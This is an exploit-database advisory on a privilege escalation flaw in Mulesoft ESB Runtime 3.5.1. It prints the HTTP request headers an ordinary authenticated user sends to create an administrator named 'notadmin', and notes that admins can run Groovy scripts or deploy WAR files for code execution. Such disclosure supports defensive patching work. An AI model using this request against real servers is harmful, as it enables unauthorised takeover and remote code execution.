Mulesoft ESB Runtime 3.5.1 Privilege Escalation / Code Execution Vulnerabilities

ID 1337DAY-ID-22785
Type zdt
Reporter Brandon Perry
Modified 2014-10-24T00:00:00


Mulesoft ESB Runtime version 3.5.1 suffers from an authenticated privilege escalation vulnerability that can lead to remote code execution.

                                            Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code

 Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.

 POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: text/x-gwt-rpc; charset=utf-8/


Content-Length: 503

Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4;

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache


 This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.

# [2016-04-19]  #